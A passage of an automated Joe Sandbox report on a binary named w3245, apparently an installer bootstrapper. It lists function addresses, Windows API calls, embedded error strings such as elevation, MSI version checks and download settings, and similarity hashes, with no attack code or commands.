                                                                                                                                                                    • Opcode Fuzzy Hash: 5f98120171c245a1957472388bd7d6e65e3157efefd2dd0517904795e56794a1
                                                                                                                                                                    • Instruction Fuzzy Hash: EF316075A00219AFDB10CFB9D949A9EBBF4EF08710F148119FD14EB284EB70E901CBA0
                                                                                                                                                                    Function 009150CA Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 84COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,?,?,0094B500), ref: 009150D3
                                                                                                                                                                    • GetProcessId.KERNEL32(000000FF,?,?,open,00000000,00000000,?,000000FF,?,?), ref: 00915171
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0091518A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Process$CloseCurrentHandle
                                                                                                                                                                    • String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
                                                                                                                                                                    • API String ID: 2815245435-1352204306
                                                                                                                                                                    • Opcode ID: 75b7b6062ef33faef7afdf0b109d359e914b9d401f995525a4f59eedb4907005
                                                                                                                                                                    • Instruction ID: 0c717d8a7fdba81aaae505de391536020ef4cf432670c4401af16b72713fb089
                                                                                                                                                                    • Opcode Fuzzy Hash: 75b7b6062ef33faef7afdf0b109d359e914b9d401f995525a4f59eedb4907005
                                                                                                                                                                    • Instruction Fuzzy Hash: A6218D75A0460DFF8F12DFA4CC81EEEBBB8EF84315B024169F810A2210D7309E909B90
                                                                                                                                                                    Function 00906882 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 75libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 009068AC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 009068B3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009068BD
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set variant value., xrefs: 00906929
                                                                                                                                                                    • variable.cpp, xrefs: 009068E1
                                                                                                                                                                    • DllGetVersion, xrefs: 0090689E
                                                                                                                                                                    • msi, xrefs: 009068A3
                                                                                                                                                                    • Failed to find DllGetVersion entry point in msi.dll., xrefs: 009068EB
                                                                                                                                                                    • Failed to get msi.dll version info., xrefs: 00906905
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                    • String ID: DllGetVersion$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$msi$variable.cpp
                                                                                                                                                                    • API String ID: 4275029093-842451892
                                                                                                                                                                    • Opcode ID: 67d99f0b0bd286467a70423aebac4eec7017ca355832d7d4c60bc2c4a3e08d8a
                                                                                                                                                                    • Instruction ID: 3dbaee81c2dbb7e96baefef80ea0731d4ebb7b431f3266b9988104d9878effd4
                                                                                                                                                                    • Opcode Fuzzy Hash: 67d99f0b0bd286467a70423aebac4eec7017ca355832d7d4c60bc2c4a3e08d8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B110676E41239BED720ABA89C46EBFBBA89B84B10F010519FE11F72C1D774DC1082E1
                                                                                                                                                                    Function 0090D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,009047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0090548E,?), ref: 0090D6DA
                                                                                                                                                                    • GetLastError.KERNEL32(?,009047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0090548E,?,?), ref: 0090D6E7
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0090D71F
                                                                                                                                                                    • GetLastError.KERNEL32(?,009047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0090548E,?,?), ref: 0090D72B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                    • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                                    • API String ID: 1866314245-2276003667
                                                                                                                                                                    • Opcode ID: 404d368d366eb3bd4ef2771f51762fb21251d10af16cc1ea9cdfb4c3b7c1b2bd
                                                                                                                                                                    • Instruction ID: 10f63dad8d2699019d3334384fb54824598089d142bec97a29ab9bbe5b0ff01f
                                                                                                                                                                    • Opcode Fuzzy Hash: 404d368d366eb3bd4ef2771f51762fb21251d10af16cc1ea9cdfb4c3b7c1b2bd
                                                                                                                                                                    • Instruction Fuzzy Hash: A811C47BA82732AFCB3156D55C15F1B6B98AF45B61F014565FE10EB2C0DB60DC0086D0
                                                                                                                                                                    Function 00901175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901186
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 00901191
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0090119F
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011BA
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009011C2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,0090111A,cabinet.dll,00000009,?,?,00000000), ref: 009011D7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorLastProc$HandleHeapInformationModule
                                                                                                                                                                    • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                    • API String ID: 3104334766-1824683568
                                                                                                                                                                    • Opcode ID: 2c697f7064b6b57d32508375074e8b800f5af9bcd4772f7c5af4c611a9a48406
                                                                                                                                                                    • Instruction ID: 7bc4fd36b15d5c4442ff66fc917d69f8d391777c67a64383421b1c90c972d27b
                                                                                                                                                                    • Opcode Fuzzy Hash: 2c697f7064b6b57d32508375074e8b800f5af9bcd4772f7c5af4c611a9a48406
                                                                                                                                                                    • Instruction Fuzzy Hash: CC01713571821ABFD7606BA69C45E6FBB5CFB81765B004015FE1592180EB70DA41DBF0
                                                                                                                                                                    Function 0091F639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0091F64E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0091F7C9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set download user., xrefs: 0091F751
                                                                                                                                                                    • UX requested unknown payload with id: %ls, xrefs: 0091F6A3
                                                                                                                                                                    • UX denied while trying to set download URL on embedded payload: %ls, xrefs: 0091F6B9
                                                                                                                                                                    • UX did not provide container or payload id., xrefs: 0091F7B8
                                                                                                                                                                    • Failed to set download password., xrefs: 0091F777
                                                                                                                                                                    • UX requested unknown container with id: %ls, xrefs: 0091F6F3
                                                                                                                                                                    • Engine is active, cannot change engine state., xrefs: 0091F668
                                                                                                                                                                    • Failed to set download URL., xrefs: 0091F728
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Engine is active, cannot change engine state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                    • API String ID: 3168844106-2615595102
                                                                                                                                                                    • Opcode ID: 205cc195ff8b7dd6b1c7a6ffe77bbdac2e9fb2be8665e1d16a836e2551d285be
                                                                                                                                                                    • Instruction ID: fe74021959d2c4bf2201f267998da9dada6ae95767725fd7cb3bd567d2941411
                                                                                                                                                                    • Opcode Fuzzy Hash: 205cc195ff8b7dd6b1c7a6ffe77bbdac2e9fb2be8665e1d16a836e2551d285be
                                                                                                                                                                    • Instruction Fuzzy Hash: 6641E53270461EABCB219F64C865FAA73ACAF80711F154676F814EB2D0EB75ED80C791
                                                                                                                                                                    Function 00945A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 00945A9B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945AA9
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00945AEA
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00945AF7
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00945C6A
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00945C79
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                                    • String ID: GET$dlutil.cpp
                                                                                                                                                                    • API String ID: 2028584396-3303425918
                                                                                                                                                                    • Opcode ID: dda3de75efe2569ab6d6601d3821ff6198c6c782877543f57020b18150d649b7
                                                                                                                                                                    • Instruction ID: 4292ec9c2ff493c1f637337983484e2761e5b42e8832fe56c28bfffedd741082
                                                                                                                                                                    • Opcode Fuzzy Hash: dda3de75efe2569ab6d6601d3821ff6198c6c782877543f57020b18150d649b7
                                                                                                                                                                    • Instruction Fuzzy Hash: B8615872A0061AABDB21CFE4CC85FAEBBB9EF48751F164119FE14B6241E770D9009F90
                                                                                                                                                                    Function 00910C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00911020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,00910C6F,?,00000000,?,00000000,00000000), ref: 0091104F
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 00910DF3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00910E00
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create syncpoint event., xrefs: 00910E2E
                                                                                                                                                                    • Failed to append payload cache action., xrefs: 00910DAA
                                                                                                                                                                    • Failed to append rollback cache action., xrefs: 00910CCF
                                                                                                                                                                    • plan.cpp, xrefs: 00910E24
                                                                                                                                                                    • Failed to append cache action., xrefs: 00910D4A
                                                                                                                                                                    • Failed to append package start action., xrefs: 00910C95
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareCreateErrorEventLastString
                                                                                                                                                                    • String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                                                                                                                    • API String ID: 801187047-2489563283
                                                                                                                                                                    • Opcode ID: 7ded59303866a0a4af8a343d5b2024cb623b8407932aeb194ebd97ff2dd36457
                                                                                                                                                                    • Instruction ID: 75b65ebd82127ff9aea75a0d190ff8371af259b201996c9196570dcdf6d34ef6
                                                                                                                                                                    • Opcode Fuzzy Hash: 7ded59303866a0a4af8a343d5b2024cb623b8407932aeb194ebd97ff2dd36457
                                                                                                                                                                    • Instruction Fuzzy Hash: FA619375A00609EFCB05DF59C980AAABBF9FFC8310F218459E9099B251DB72EDC1DB50
                                                                                                                                                                    Function 00946EFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,74DEDFD0,000000FF,type,000000FF,?,74DEDFD0,74DEDFD0,74DEDFD0), ref: 00946F55
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946FA0
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094701C
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947068
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Free$Compare
                                                                                                                                                                    • String ID: `<u$type$url
                                                                                                                                                                    • API String ID: 1324494773-1686489133
                                                                                                                                                                    • Opcode ID: 43fac8cce39a316e94e4bdc9a435a3c194fa668ea9b0656cb3f4f1168d7f300e
                                                                                                                                                                    • Instruction ID: cc78f1ac7895776c6003a8c12821ce56f2203a39fff61f4ffc30e274b961b55a
                                                                                                                                                                    • Opcode Fuzzy Hash: 43fac8cce39a316e94e4bdc9a435a3c194fa668ea9b0656cb3f4f1168d7f300e
                                                                                                                                                                    • Instruction Fuzzy Hash: 11514C75906219FFCB25DFE4C844FAEBBB8AF05711F144299E511EB2A0D7319E04DB90
                                                                                                                                                                    Function 009105A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0094B500,00000000,?), ref: 009106D3
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,0094B500,00000000,?), ref: 009106E2
                                                                                                                                                                      • Part of subcall function 00940BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0091061A,?,00000000,00020006), ref: 00940C0E
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 009105AC
                                                                                                                                                                    • Failed to delete registration key: %ls, xrefs: 00910681
                                                                                                                                                                    • Failed to update resume mode., xrefs: 009106B7
                                                                                                                                                                    • Failed to open registration key., xrefs: 0091071A
                                                                                                                                                                    • %ls.RebootRequired, xrefs: 009105F0
                                                                                                                                                                    • Failed to write volatile reboot required registry key., xrefs: 0091061E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Create
                                                                                                                                                                    • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                                                                                                                                    • API String ID: 359002179-3398658923
                                                                                                                                                                    • Opcode ID: 1a4e9984724ba89222eaa66d7bf4950353c181a8ecad4a9790cd6875036bc89a
                                                                                                                                                                    • Instruction ID: 6a1a29dfe302f77b2d851d1127f87a1b2e62eb7b69ba0ea4f84e480badf7344f
                                                                                                                                                                    • Opcode Fuzzy Hash: 1a4e9984724ba89222eaa66d7bf4950353c181a8ecad4a9790cd6875036bc89a
                                                                                                                                                                    • Instruction Fuzzy Hash: 27419D31A0061CFBDF22AEA0DC06FEF7BBAAFC0354F100519F91562061D7B29AA4DB51
                                                                                                                                                                    Function 0090F451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090F48A
                                                                                                                                                                      • Part of subcall function 00904115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?), ref: 00904123
                                                                                                                                                                      • Part of subcall function 00904115: GetLastError.KERNEL32(?,0091A0E8,00000000,00000000,?,00000000,009053BD,00000000,?,?,0090D5B5,?,00000000,00000000), ref: 00904131
                                                                                                                                                                    • lstrlenA.KERNEL32(0094B500,00000000,00000094,00000000,00000094,?,?,009104BF,swidtag,00000094,?,0094B518,009104BF,00000000,?,00000000), ref: 0090F4DD
                                                                                                                                                                      • Part of subcall function 00944DB3: CreateFileW.KERNEL32(0094B500,40000000,00000001,00000000,00000002,00000080,00000000,009104BF,00000000,?,0090F4F4,?,00000080,0094B500,00000000), ref: 00944DCB
                                                                                                                                                                      • Part of subcall function 00944DB3: GetLastError.KERNEL32(?,0090F4F4,?,00000080,0094B500,00000000,?,009104BF,?,00000094,?,?,?,?,?,00000000), ref: 00944DD8
                                                                                                                                                                    Strings
                                                                                                                                                                    • swidtag, xrefs: 0090F49D
                                                                                                                                                                    • Failed to write tag xml to file: %ls, xrefs: 0090F51B
                                                                                                                                                                    • Failed to format tag folder path., xrefs: 0090F543
                                                                                                                                                                    • Failed to create regid folder: %ls, xrefs: 0090F525
                                                                                                                                                                    • Failed to allocate regid file path., xrefs: 0090F535
                                                                                                                                                                    • Failed to allocate regid folder path., xrefs: 0090F53C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                                                                                                                    • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                                                                                                                    • API String ID: 904508749-1201533908
                                                                                                                                                                    • Opcode ID: db621e7f493781c633825249e6f9ad7fcb5558a525e41e173ac731ef9512eeb3
                                                                                                                                                                    • Instruction ID: feafb253f905e6bc7369ca5e470bb52c9c2e9a745e57a24bf6f6a5570353003c
                                                                                                                                                                    • Opcode Fuzzy Hash: db621e7f493781c633825249e6f9ad7fcb5558a525e41e173ac731ef9512eeb3
                                                                                                                                                                    • Instruction Fuzzy Hash: A6318C32D00229BFCF219FA4CC51BADBBB8AF44710F108165F910BA2A1D771AF50EB90
                                                                                                                                                                    Function 009153E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0090548E,00000000,00000000,?,00000000), ref: 0091548B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00904C61,?,?,00000000,?,?,?,?,?,?,0094B4A0,?,?), ref: 00915496
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to wait for child process exit., xrefs: 009154C4
                                                                                                                                                                    • Failed to post terminate message to child process., xrefs: 00915476
                                                                                                                                                                    • Failed to write restart to message buffer., xrefs: 0091542E
                                                                                                                                                                    • Failed to write exit code to message buffer., xrefs: 00915406
                                                                                                                                                                    • Failed to post terminate message to child process cache thread., xrefs: 0091545A
                                                                                                                                                                    • pipe.cpp, xrefs: 009154BA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                    • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                                    • API String ID: 1211598281-2161881128
                                                                                                                                                                    • Opcode ID: 07287ce87eea2cafa2504d56133743e3bfbc365163288459a273cac5cb77945f
                                                                                                                                                                    • Instruction ID: 7f1924c85514b63e1a9458484921f7fa0f56dbefd834c19b7e09461c7b60f2b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 07287ce87eea2cafa2504d56133743e3bfbc365163288459a273cac5cb77945f
                                                                                                                                                                    • Instruction Fuzzy Hash: D421C336A41A2DFBCB129A549C05FDE7B68AF80726F134251F910A61E0E734AED097D0
                                                                                                                                                                    Function 00919098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00919F04,00000003,000007D0,00000003,?,000007D0), ref: 009190B2
                                                                                                                                                                    • GetLastError.KERNEL32(?,00919F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 009190BF
